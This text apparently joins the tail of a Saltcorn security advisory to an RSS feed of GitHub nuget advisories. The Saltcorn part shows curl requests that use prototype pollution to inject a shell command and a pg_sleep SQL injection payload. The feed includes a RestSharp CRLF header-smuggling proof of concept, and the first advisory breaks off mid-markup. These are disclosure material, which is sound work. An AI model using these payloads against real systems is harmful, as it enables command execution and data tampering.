<span class="pl-k">await</span> <span class="pl-en">getState</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">.</span><span class="pl-en">setConfig</span><span class="pl-kos">(</span><span class="pl-s">"localizer_strings"</span><span class="pl-kos">,</span> <span class="pl-s1">cfgStrings</span><span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-s1">res</span><span class="pl-kos">.</span><span class="pl-en">redirect</span><span class="pl-kos">(</span><span class="pl-s">`/site-structure/localizer/edit/<span class="pl-s1"><span class="pl-kos">${</span><span class="pl-s1">lang</span><span class="pl-kos">}</span></span>`</span><span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-kos">}</span><span class="pl-kos">)</span>
<span class="pl-kos">)</span><span class="pl-kos">;</span></pre></div>
<h3>PoC</h3>
<p>Setup:</p>
<ul>
<li>set <code class="notranslate">SALTCORN_NWORKERS=1</code> before starting the <code class="notranslate">saltcorn</code> server (to easily observe the behavior of the PoC)</li>
</ul>
<pre class="notranslate"><code class="notranslate">SALTCORN_NWORKERS=1 saltcorn serve
</code></pre>
<ul>
<li>make sure to use the PostgreSQL backend</li>
<li>login with a user with admin permission</li>
</ul>
<h4>RCE</h4>
<p>This PoC demonstrates how to escalate the Prototype Pollution vulnerability to change the behavior of certain commands that get executed.</p>
<ul>
<li>check that the file that will be created does not exist:</li>
</ul>
<pre class="notranslate"><code class="notranslate">cat /tmp/RCE
cat: /tmp/RCE: No such file or directory
</code></pre>
<ul>
<li>pollute the <code class="notranslate">Object.prototype</code> with a <code class="notranslate">tempRootFolder</code> value set to <code class="notranslate">;echo+"rce"|tee+/tmp/RCE;</code> by sending the following request *** :</li>
</ul>
<div class="highlight highlight-source-shell"><pre class="notranslate">curl -i -X <span class="pl-s"><span class="pl-pds">$'</span>POST<span class="pl-pds">'</span></span> \
-H <span class="pl-s"><span class="pl-pds">$'</span>Host: localhost:3000<span class="pl-pds">'</span></span> \
-H <span class="pl-s"><span class="pl-pds">$'</span>Content-Type: application/x-www-form-urlencoded; charset=UTF-8<span class="pl-pds">'</span></span> -H <span class="pl-s"><span class="pl-pds">$'</span>Accept: */*<span class="pl-pds">'</span></span> \
-H <span class="pl-s"><span class="pl-pds">$'</span>Origin: http://localhost:3000<span class="pl-pds">'</span></span> \
-H <span class="pl-s"><span class="pl-pds">$'</span>Connection: close<span class="pl-pds">'</span></span> \
-b <span class="pl-s"><span class="pl-pds">$'</span>loggedin=true; connect.sid=VALID_CONNECT_SID_COOKIE<span class="pl-pds">'</span></span> \
--data-binary <span class="pl-s"><span class="pl-pds">$'</span>_csrf=VALID_csrf_Value&amp;value=;echo+"rce"|tee+/tmp/RCE;<span class="pl-pds">'</span></span> \
<span class="pl-s"><span class="pl-pds">$'</span>http://localhost:3000/site-structure/localizer/save-string/__proto__/tempRootFolder<span class="pl-pds">'</span></span></pre></div>
<p>visit <code class="notranslate">http://localhost:3000/plugins/new</code></p>
<ul>
<li>enter the following fields:
<ul>
<li>Name: <code class="notranslate">test</code></li>
<li>Source: <code class="notranslate">git</code></li>
<li>other fields blank</li>
<li>click <code class="notranslate">Create</code></li>
</ul>
</li>
<li>you will get an error but the command <code class="notranslate">echo "rce" | tee /tmp/RCE</code> will be executed</li>
<li>to verify:</li>
</ul>
<pre class="notranslate"><code class="notranslate">cat /tmp/RCE
rce
</code></pre>
<p>The RCE occurs because after the previous curl request, the <code class="notranslate">tempRootFolder</code> property is set to <code class="notranslate">;echo+"rce"|tee+/tmp/RCE;</code> that is later used to build the shell commands.</p>
<ul>
<li>file: <a href="https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/plugin_installer.js#L45-L58">https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/plugin_installer.js#L45-L58</a></li>
</ul>
<div class="highlight highlight-source-js"><pre class="notranslate"><span class="pl-k">class</span> <span class="pl-v">PluginInstaller</span> <span class="pl-kos">{</span>
<span class="pl-en">constructor</span><span class="pl-kos">(</span><span class="pl-s1">plugin</span><span class="pl-kos">,</span> <span class="pl-s1">opts</span> <span class="pl-c1">=</span> <span class="pl-kos">{</span><span class="pl-kos">}</span><span class="pl-kos">)</span> <span class="pl-kos">{</span> <span class="pl-c">// opts will have the tempRootFolder property set with dangerous values // [2]</span>
<span class="pl-kos">[</span>...<span class="pl-kos">]</span>
<span class="pl-smi">this</span><span class="pl-kos">.</span><span class="pl-c1">tempRootFolder</span> <span class="pl-c1">=</span>
<span class="pl-s1">opts</span><span class="pl-kos">.</span><span class="pl-c1">tempRootFolder</span> <span class="pl-c1">||</span> <span class="pl-en">envPaths</span><span class="pl-kos">(</span><span class="pl-s">"saltcorn"</span><span class="pl-kos">,</span> <span class="pl-kos">{</span> <span class="pl-c1">suffix</span>: <span class="pl-s">"tmp"</span> <span class="pl-kos">}</span><span class="pl-kos">)</span><span class="pl-kos">.</span><span class="pl-c1">temp</span><span class="pl-kos">;</span> <span class="pl-c">// [3]</span>
<span class="pl-kos">[</span>...<span class="pl-kos">]</span>
<span class="pl-smi">this</span><span class="pl-kos">.</span><span class="pl-c1">pckJsonPath</span> <span class="pl-c1">=</span> <span class="pl-en">join</span><span class="pl-kos">(</span><span class="pl-smi">this</span><span class="pl-kos">.</span><span class="pl-c1">pluginDir</span><span class="pl-kos">,</span> <span class="pl-s">"package.json"</span><span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-smi">this</span><span class="pl-kos">.</span><span class="pl-c1">tempDir</span> <span class="pl-c1">=</span> <span class="pl-en">join</span><span class="pl-kos">(</span><span class="pl-smi">this</span><span class="pl-kos">.</span><span class="pl-c1">tempRootFolder</span><span class="pl-kos">,</span> <span class="pl-s">"temp_install"</span><span class="pl-kos">,</span> ...<span class="pl-s1">tokens</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-c">// [4]</span>
<span class="pl-kos">[</span>...<span class="pl-kos">]</span>
<span class="pl-kos">}</span>
<span class="pl-kos">[</span>...<span class="pl-kos">]</span>
<span class="pl-kos">}</span></pre></div>
<h4>SQL Injection</h4>
<p>This PoC demonstrates how to escalate the Prototype Pollution vulnerability to change the behavior of certain SQL queries (i.e. SQLi).</p>
<ul>
<li>visit <code class="notranslate">http://localhost:3000/table</code> to check the page returns some results (no errors)</li>
<li>pollute the <code class="notranslate">Object.prototype</code> with a schema value set to <code class="notranslate">"</code> (just to create an exception in the query that will be executed to demonstrate the issue) by sending the following request *** :</li>
</ul>
<pre class="notranslate"><code class="notranslate">curl -i -X $'POST' \
-H $'Host: localhost:3000' \
-H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Accept: */*' \
-H $'Origin: http://localhost:3000' \
-H $'Connection: close' \
-b $'loggedin=true; connect.sid=VALID_CONNECT_SID_COOKIE' \
--data-binary $'_csrf=VALID_csrf_Value&amp;value=\"' \
$'http://localhost:3000/site-structure/localizer/save-string/__proto__/schema'
</code></pre>
<ul>
<li>visit again <code class="notranslate">http://localhost:3000/table</code> but this time an SQL error will appear:</li>
</ul>
<pre class="notranslate"><code class="notranslate">syntax error at or near "" order by lower(""
</code></pre>
<p><strong>NOTE</strong>: Another payload to use as <code class="notranslate">value</code> could be <code class="notranslate">pg_user"+WHERE+1=1+AND+(SELECT+pg_sleep(5))+IS+NOT+NULL+--</code></p>
<p>The SQL injection occurs because after the previous curl request, the <code class="notranslate">schema</code> property is set to <code class="notranslate">"</code>.</p>
<ul>
<li>file: <a href="https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/postgres/postgres.js#L101">https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/postgres/postgres.js#L101</a></li>
</ul>
<div class="highlight highlight-source-js"><pre class="notranslate"><span class="pl-k">const</span> <span class="pl-en">select</span> <span class="pl-c1">=</span> <span class="pl-k">async</span> <span class="pl-kos">(</span><span class="pl-s1">tbl</span><span class="pl-kos">,</span> <span class="pl-s1">whereObj</span><span class="pl-kos">,</span> <span class="pl-s1">selectopts</span> <span class="pl-c1">=</span> <span class="pl-kos">{</span><span class="pl-kos">}</span><span class="pl-kos">)</span> <span class="pl-c1">=&gt;</span> <span class="pl-kos">{</span> <span class="pl-c">// [2] selectopts</span>
<span class="pl-k">const</span> <span class="pl-kos">{</span> where<span class="pl-kos">,</span> values <span class="pl-kos">}</span> <span class="pl-c1">=</span> <span class="pl-en">mkWhere</span><span class="pl-kos">(</span><span class="pl-s1">whereObj</span><span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-k">const</span> <span class="pl-s1">schema</span> <span class="pl-c1">=</span> <span class="pl-s1">selectopts</span><span class="pl-kos">.</span><span class="pl-c1">schema</span> <span class="pl-c1">||</span> <span class="pl-en">getTenantSchema</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-c">// [3] selectopts.schema</span>
<span class="pl-k">const</span> <span class="pl-s1">sql</span> <span class="pl-c1">=</span> <span class="pl-s">`SELECT <span class="pl-s1"><span class="pl-kos">${</span></span></span>
<span class="pl-s"><span class="pl-s1"> <span class="pl-s1">selectopts</span><span class="pl-kos">.</span><span class="pl-c1">fields</span> ? <span class="pl-s1">selectopts</span><span class="pl-kos">.</span><span class="pl-c1">fields</span><span class="pl-kos">.</span><span class="pl-en">join</span><span class="pl-kos">(</span><span class="pl-s">", "</span><span class="pl-kos">)</span> : <span class="pl-s">`*`</span></span></span>
<span class="pl-s"><span class="pl-s1"> <span class="pl-kos">}</span></span> FROM "<span class="pl-s1"><span class="pl-kos">${</span><span class="pl-s1">schema</span><span class="pl-kos">}</span></span>"."<span class="pl-s1"><span class="pl-kos">${</span><span class="pl-en">sqlsanitize</span><span class="pl-kos">(</span><span class="pl-s1">tbl</span><span class="pl-kos">)</span><span class="pl-kos">}</span></span>" <span class="pl-s1"><span class="pl-kos">${</span><span class="pl-s1">where</span><span class="pl-kos">}</span></span> <span class="pl-s1"><span class="pl-kos">${</span><span class="pl-en">mkSelectOptions</span><span class="pl-kos">(</span> <span class="pl-c">// [4] schema</span></span></span>
<span class="pl-s"><span class="pl-s1"> <span class="pl-s1">selectopts</span><span class="pl-kos">,</span></span></span>
<span class="pl-s"><span class="pl-s1"> <span class="pl-s1">values</span><span class="pl-kos">,</span></span></span>
<span class="pl-s"><span class="pl-s1"> <span class="pl-c1">false</span></span></span>
<span class="pl-s"><span class="pl-s1"> <span class="pl-kos">)</span><span class="pl-kos">}</span></span>`</span><span class="pl-kos">;</span>
<span class="pl-en">sql_log</span><span class="pl-kos">(</span><span class="pl-s1">sql</span><span class="pl-kos">,</span> <span class="pl-s1">values</span><span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-k">const</span> <span class="pl-s1">tq</span> <span class="pl-c1">=</span> <span class="pl-k">await</span> <span class="pl-kos">(</span><span class="pl-s1">client</span> <span class="pl-c1">||</span> <span class="pl-s1">selectopts</span><span class="pl-kos">.</span><span class="pl-c1">client</span> <span class="pl-c1">||</span> <span class="pl-s1">pool</span><span class="pl-kos">)</span><span class="pl-kos">.</span><span class="pl-en">query</span><span class="pl-kos">(</span><span class="pl-s1">sql</span><span class="pl-kos">,</span> <span class="pl-s1">values</span><span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-k">return</span> <span class="pl-s1">tq</span><span class="pl-kos">.</span><span class="pl-c1">rows</span><span class="pl-kos">;</span>
<span class="pl-kos">}</span><span class="pl-kos">;</span></pre></div>
<p>*** Retrieve valid values for the <code class="notranslate">connect.sid</code> (<code class="notranslate">VALID_CONNECT_SID_COOKIE</code>) and <code class="notranslate">_csrf</code> (<code class="notranslate">VALID_csrf_Value</code>) values:</p>
<ul>
<li>open the browser developer console and go to the <code class="notranslate">Network</code> tab</li>
<li>visit <code class="notranslate">http://localhost:3000/site-structure/localizer/add-lang</code></li>
<li>add a language (<code class="notranslate">Name: test</code> , <code class="notranslate">Locale: test</code>) and click <code class="notranslate">Save</code></li>
<li>under the <code class="notranslate">Network</code> tab, filter for <code class="notranslate">save-lang</code> and check the request parameters (<code class="notranslate">Headers</code> and <code class="notranslate">Payload</code>/<code class="notranslate& ... |
http://localhost:1200/github/advisor/data/reviewed/nuget - Success ✔️<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - nuget - reviewed</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github/advisor/data/reviewed/nuget" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - nuget - reviewed - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Sat, 05 Oct 2024 18:31:14 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>CRLF Injection in RestSharp's `RestRequest.AddHeader` method</title>
<description><h3>Summary</h3>
<p>The second argument to <code class="notranslate">RestRequest.AddHeader</code> (the header value) is vulnerable to CRLF injection. The same applies to <code class="notranslate">RestRequest.AddOrUpdateHeader</code> and <code class="notranslate">RestClient.AddDefaultHeader</code>.</p>
<h3>Details</h3>
<p>The way HTTP headers are added to a request is via the <code class="notranslate">HttpHeaders.TryAddWithoutValidation</code> method: <a href="https://github.com/restsharp/RestSharp/blob/777bf194ec2d14271e7807cc704e73ec18fcaf7e/src/RestSharp/Request/HttpRequestMessageExtensions.cs#L32">https://github.com/restsharp/RestSharp/blob/777bf194ec2d14271e7807cc704e73ec18fcaf7e/src/RestSharp/Request/HttpRequestMessageExtensions.cs#L32</a> This method does not check for CRLF characters in the header value.</p>
<p>This means that any headers from a <code class="notranslate">RestSharp.RequestHeaders</code> object are added to the request in such a way that they are vulnerable to CRLF-injection. In general, CRLF-injection into an HTTP header (when using HTTP/1.1) means that one can inject additional HTTP headers or smuggle whole HTTP requests.</p>
<h3>PoC</h3>
<p>The below example code creates a console app that takes one command line variable "api key" and then makes a request to some status page with the provided key inserted in the "Authorization" header:</p>
<div class="highlight highlight-source-cs"><pre class="notranslate"><span class="pl-k">using</span> RestSharp<span class="pl-kos">;</span>
<span class="pl-k">class</span> <span class="pl-smi">Program</span>
<span class="pl-kos">{</span>
<span class="pl-k"><span class="pl-k">static</span></span> <span class="pl-k">async</span> Task <span class="pl-en">Main</span><span class="pl-kos">(</span><span class="pl-smi">string</span><span class="pl-kos">[</span><span class="pl-kos">]</span> <span class="pl-s1">args</span><span class="pl-kos">)</span>
<span class="pl-kos">{</span>
<span class="pl-c">// Usage: dotnet run &lt;api key&gt;</span>
<span class="pl-smi">var</span> <span class="pl-s1">key</span> <span class="pl-c1">=</span> args<span class="pl-kos">[</span><span class="pl-c1">0</span><span class="pl-kos">]</span><span class="pl-kos">;</span>
<span class="pl-smi">var</span> <span class="pl-s1">options</span> <span class="pl-c1">=</span> <span class="pl-k">new</span> RestClientOptions<span class="pl-kos">(</span><span class="pl-s"><span class="pl-s">"</span>http://insert.some.site.here<span class="pl-s">"</span></span><span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-smi">var</span> <span class="pl-s1">client</span> <span class="pl-c1">=</span> <span class="pl-k">new</span> RestClient<span class="pl-kos">(</span>options<span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-smi">var</span> <span class="pl-s1">request</span> <span class="pl-c1">=</span> <span class="pl-k">new</span> RestRequest<span class="pl-kos">(</span><span class="pl-s"><span class="pl-s">"</span>/status<span class="pl-s">"</span></span><span class="pl-kos">,</span> Method<span class="pl-kos">.</span>Get<span class="pl-kos">)</span><span class="pl-kos">.</span><span class="pl-en">AddHeader</span><span class="pl-kos">(</span><span class="pl-s"><span class="pl-s">"</span>Authorization<span class="pl-s">"</span></span><span class="pl-kos">,</span> key<span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-smi">var</span> <span class="pl-s1">response</span> <span class="pl-c1">=</span> <span class="pl-k">await</span> client<span class="pl-kos">.</span><span class="pl-en">ExecuteAsync</span><span class="pl-kos">(</span>request<span class="pl-kos">)</span><span class="pl-kos">;</span>
Console<span class="pl-kos">.</span><span class="pl-en">WriteLine</span><span class="pl-kos">(</span><span class="pl-s">$"</span><span class="pl-s">Status: </span><span class="pl-kos">{</span>response<span class="pl-kos">.</span>StatusCode<span class="pl-kos">}</span><span class="pl-s">"</span><span class="pl-kos">)</span><span class="pl-kos">;</span>
Console<span class="pl-kos">.</span><span class="pl-en">WriteLine</span><span class="pl-kos">(</span><span class="pl-s">$"</span><span class="pl-s">Response: </span><span class="pl-kos">{</span>response<span class="pl-kos">.</span>Content<span class="pl-kos">}</span><span class="pl-s">"</span><span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-kos">}</span>
<span class="pl-kos">}</span></pre></div>
<p>This application is now vulnerable to CRLF-injection, and can thus be abused to, for example, perform request splitting and thus server side request forgery (SSRF):</p>
<div class="highlight highlight-source-shell"><pre class="notranslate">anonymous@ubuntu-sofia-672448:<span class="pl-k">~</span>$ dotnet RestSharp-cli.dll <span class="pl-s"><span class="pl-pds">$'</span>test<span class="pl-cce">\r\n</span>User-Agent: injected header!<span class="pl-cce">\r\n\r\n</span>GET /smuggled HTTP/1.1<span class="pl-cce">\r\n</span>Host: insert.some.site.here<span class="pl-pds">'</span></span>
Status: OK
Response: <span class="pl-k">&lt;</span>html&gt;&lt;/html<span class="pl-k">&gt;</span></pre></div>
<p>The application intends to send a single request of the form:</p>
<div class="highlight highlight-source-httpspec"><pre class="notranslate"><span class="pl-k">GET</span><span class="pl-c1"> /status HTTP/1.1</span>
<span class="pl-s"><span class="pl-v">Host:</span> insert.some.site.here</span>
<span class="pl-s"><span class="pl-v">Authorization:</span> &lt;api key&gt;</span>
<span class="pl-s"><span class="pl-v">User-Agent:</span> RestSharp/111.4.1.0</span>
<span class="pl-s"><span class="pl-v">Accept:</span> application/json, text/json, text/x-json, text/javascript, application/xml, text/xml</span>
<span class="pl-s"><span class="pl-v">Accept-Encoding:</span> gzip, deflate, br</span></pre></div>
<p>But as the application is vulnerable to CRLF injection the above command will instead result in the following two requests being sent:</p>
<div class="highlight highlight-source-httpspec"><pre class="notranslate"><span class="pl-k">GET</span><span class="pl-c1"> /status HTTP/1.1</span>
<span class="pl-s"><span class="pl-v">Host:</span> insert.some.site.here</span>
<span class="pl-s"><span class="pl-v">Authorization:</span> test</span>
<span class="pl-s"><span class="pl-v">User-Agent:</span> injected header!</span></pre></div>
<p>and</p>
<div class="highlight highlight-source-httpspec"><pre class="notranslate"><span class="pl-k">GET</span><span class="pl-c1"> /smuggled HTTP/1.1</span>
<span class="pl-s"><span class="pl-v">Host:</span> insert.some.site.here</span>
<span class="pl-s"><span class="pl-v">User-Agent:</span> RestSharp/111.4.1.0</span>
<span class="pl-s"><span class="pl-v">Accept:</span> application/json, text/json, text/x-json, text/javascript, application/xml, text/xml</span>
<span class="pl-s"><span class="pl-v">Accept-Encoding:</span> gzip, deflate, br</span></pre></div>
<p>This can be confirmed by checking the access logs on the server where these commands were run (with <code class="notranslate">insert.some.site.here</code> pointing to localhost):</p>
<div class="highlight highlight-source-shell"><pre class="notranslate">anonymous@ubuntu-sofia-672448:<span class="pl-k">~</span>$ sudo tail /var/log/apache2/access.log
127.0.0.1 - - [29/Aug/2024:11:41:11 +0000] <span class="pl-s"><span class="pl-pds">"</span>GET /status HTTP/1.1<span class="pl-pds">"</span></span> 200 240 <span class="pl-s"><span class="pl-pds">"</span>-<span class="pl-pds">"</span></span> <span class="pl-s"><span class="pl-pds">"</span>injected header!<span class="pl-pds">"</span></span>
127.0.0.1 - - [29/Aug/2024:11:41:11 +0000] <span class="pl-s"><span class="pl-pds">"</span>GET /smuggled HTTP/1.1<span class="pl-pds">"</span></span> 404 436 <span class="pl-s"><span class="pl-pds">"</span>-<span class="pl-pds">"</span></span> <span class="pl-s"><span class="pl-pds">"</span>RestSharp/111.4.1.0<span class="pl-pds">"</span></span></pre></div>
<h3>Impact</h3>
<p>If an application using the RestSharp library passes a user-controllable value through to a header, then that application becomes vulnerable to CRLF-injection. This is not necessarily a security issue for a command line application like the one above, but if such code were present in a web application then it becomes vulnerable to request splitting (as shown in the PoC) and thus Server Side Request Forgery.</p>
<p>Strictly speaking this is a potential vulnerability in applications using RestSharp, not in RestSharp itself, but I would argue that at the very least there needs to be a warning about this behaviour in the RestSharp documentation.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-4rr6-2v9v-wcpc" href="https://github.com/restsharp/RestSharp/security/advisories/GHSA-4rr6-2v9v-wcpc">GHSA-4rr6-2v9v-wcpc</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/restsharp/RestSharp/commit/0fba5e727d241b1867bd71efc912594075c2934b/hovercard" href="https://github.com/restsharp/RestSharp/commit/0fba5e727d241b1867bd71efc912594075c2934b">restsharp/RestSharp@<tt>0fba5e7</tt></a></li>
<li><a href="https://github.com/restsharp/RestSharp/blob/777bf194ec2d14271e7807cc704e73ec18fcaf7e/src/RestSharp/Request/HttpRequestMessageExtensions.cs#L32">https://github.com/restsharp/RestSharp/blob/777bf194ec2d14271e7807cc704e73ec18fcaf7e/src/RestSharp/Request/HttpRequestMessageExtensions.cs#L32</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45302" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-45302</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-4rr6-2v9v-wcpc</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-4rr6-2v9v-wcpc</guid>
<pubDate>Thu, 29 Aug 2024 19:30:51 GMT</pubDate>
</item>
<item>
<title>Serilog Client IP Spoofing vulnerability</title>
<description><p>Serilog (before v2.1.0) contains a Client IP Spoofing vulnerability, which allows attackers to falsify their IP addresses in log files by specifying an arbitrary IP as the value of the X-Forwarded-For or Client-Ip headers while performing HTTP requests.</p>
<p>It is not possible to configure Serilog.Enrichers.ClientInfo to not trust the X-Forwarded-For header.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-44930" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-44930</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1967132009" data-permission-text="Title is private" data-url="https://github.com/serilog-contrib/serilog-enrichers-clientinfo/issues/29" data-hovercard-type="issue" data-hovercard-url="/serilog-contrib/serilog-enrichers-clientinfo/issues/29/hovercard" href="https://github.com/serilog-contrib/serilog-enrichers-clientinfo/issues/29">serilog-contrib/serilog-enrichers-clientinfo#29</a></li>
<li><a href="https://github.com/serilog-contrib/serilog-enrichers-clientinfo/releases/tag/v2.1.0">https://github.com/serilog-contrib/serilog-enrichers-clientinfo/releases/tag/v2.1.0</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2417399908" data-permission-text="Title is private" data-url="https://github.com/serilog-contrib/serilog-enrichers-clientinfo/issues/38" data-hovercard-type="pull_request" data-hovercard-url="/serilog-contrib/serilog-enrichers-clientinfo/pull/38/hovercard" href="https://github.com/serilog-contrib/serilog-enrichers-clientinfo/pull/38">serilog-contrib/serilog-enrichers-clientinfo#38</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/serilog-contrib/serilog-enrichers-clientinfo/commit/a72051d1900131e6fb30bcfd9491a988167fb6ac/hovercard" href="https://github.com/serilog-contrib/serilog-enrichers-clientinfo/commit/a72051d1900131e6fb30bcfd9491a988167fb6ac">serilog-contrib/serilog-enrichers-clientinfo@<tt>a72051d</tt></a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-5x5q-cqf6-gj8r</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-5x5q-cqf6-gj8r</guid>
<pubDate>Thu, 29 Aug 2024 18:31:36 GMT</pubDate>
</item>
<item>
<title>Umbraco CMS Improper Access Control vulnerability</title>
<description><h3>Impact</h3>
<p>As an authenticated user, one can access a few unintended endpoints.</p>
<h3>Explanation of the vulnerability</h3>
<p>A few endpoints in the Umbraco Management API were not protected by a specific section; they only required the caller to be authenticated. Because a member is also just an authenticated user, it was possible to get information from these endpoints using a member token.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-hrww-x3fq-xcvh" href="https://github.com/umbraco/Umbraco-CMS/security/advisories/GHSA-hrww-x3fq-xcvh">GHSA-hrww-x3fq-xcvh</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-43377" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-43377</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/umbraco/Umbraco-CMS/commit/72bef8861d94a39d5cc9530a04c4797b91fcbecf/hovercard" href="https://github.com/umbraco/Umbraco-CMS/commit/72bef8861d94a39d5cc9530a04c4797b91fcbecf">umbraco/Umbraco-CMS@<tt>72bef88</tt></a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hrww-x3fq-xcvh</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hrww-x3fq-xcvh</guid>
<pubDate>Tue, 20 Aug 2024 18:32:26 GMT</pubDate>
</item>
<item>
<title>Umbraco CMS vulnerable to Generation of Error Message Containing Sensitive Information</title>
<description><h3>Impact</h3>
<p>Some endpoints in the Management API can return stack trace information, even when Umbraco is not in debug mode.</p>
<h3>Explanation of the vulnerability</h3>
<p>Management API endpoints leaked stack traces on internal server errors regardless of whether the debug setting was disabled.</p>
<p>For example, when paging with negative numbers in some APIs.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-77gj-crhp-3gvx" href="https://github.com/umbraco/Umbraco-CMS/security/advisories/GHSA-77gj-crhp-3gvx">GHSA-77gj-crhp-3gvx</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-43376" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-43376</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/umbraco/Umbraco-CMS/commit/b76070c794925932cb159ef50b851db6e966a004/hovercard" href="https://github.com/umbraco/Umbraco-CMS/commit/b76070c794925932cb159ef50b851db6e966a004">umbraco/Umbraco-CMS@<tt>b76070c</tt></a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-77gj-crhp-3gvx</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-77gj-crhp-3gvx</guid>
<pubDate>Tue, 20 Aug 2024 18:25:15 GMT</pubDate>
</item>
<item>
<title>Microsoft Security Advisory CVE-2024-38168 | .NET Denial of Service Vulnerability</title>
<description><h1>Microsoft Security Advisory <a title="CVE-2024-38168" data-hovercard-type="advisory" data-hovercard-url="/advisories/GHSA-7qrv-8f9x-3h32/hovercard" href="https://github.com/advisories/GHSA-7qrv-8f9x-3h32">CVE-2024-38168</a> | .NET Denial of Service Vulnerability</h1>
<h2><a name="user-content-executive-summary"></a>Executive summary</h2>
<p>Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 8.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.</p>
<p>A vulnerability exists in .NET where an attacker, through unauthenticated requests, may trigger a Denial of Service in the ASP.NET HTTP.sys web server. This is a Windows-only vulnerability.</p>
<h2>Announcement</h2>
<p>Announcement for this issue can be found at <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2463848613" data-permission-text="Title is private" data-url="https://github.com/dotnet/announcements/issues/320" data-hovercard-type="issue" data-hovercard-url="/dotnet/announcements/issues/320/hovercard" href="https://github.com/dotnet/announcements/issues/320">dotnet/announcements#320</a></p>
<h2><a name="user-content-mitigation-factors"></a>Mitigation factors</h2>
<p>Microsoft has not identified any mitigating factors for this vulnerability.</p>
<h2><a name="user-content-affected-software"></a>Affected software</h2>
<ul>
<li>Any .NET 8.0 application running on .NET 8.0.7 or earlier.</li>
</ul>
<h2><a name="user-content-affected-packages"></a>Affected Packages</h2>
<p>The vulnerability affects any Microsoft .NET Core project if it uses any of the affected package versions listed below.</p>
<h3><a name="user-content-.net 8"></a>.NET 8</h3>
<markdown-accessiblity-table><table role="table">
<thead>
<tr>
<th>Package name</th>
<th>Affected version</th>
<th>Patched version</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm" rel="nofollow">Microsoft.AspNetCore.App.Runtime.win-arm</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64" rel="nofollow">Microsoft.AspNetCore.App.Runtime.win-arm64</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64" rel="nofollow">Microsoft.AspNetCore.App.Runtime.win-x64</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
<tr>
<td><a href="https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86" rel="nofollow">Microsoft.AspNetCore.App.Runtime.win-x86</a></td>
<td>&gt;= 8.0.0, &lt; 8.0.8</td>
<td>8.0.8</td>
</tr>
</tbody>
</table></markdown-accessiblity-table>
<h2>Advisory FAQ</h2>
<h3><a name="user-content-how-affected"></a>How do I know if I am affected?</h3>
<p>If you have a runtime or SDK with a version listed, or an affected package listed in <a href="https://github.com/advisories/GHSA-7qrv-8f9x-3h32#affected-packages">affected software</a> or <a href="https://github.com/advisories/GHSA-7qrv-8f9x-3h32#affected-software">affected packages</a>, you're exposed to the vulnerability.</p>
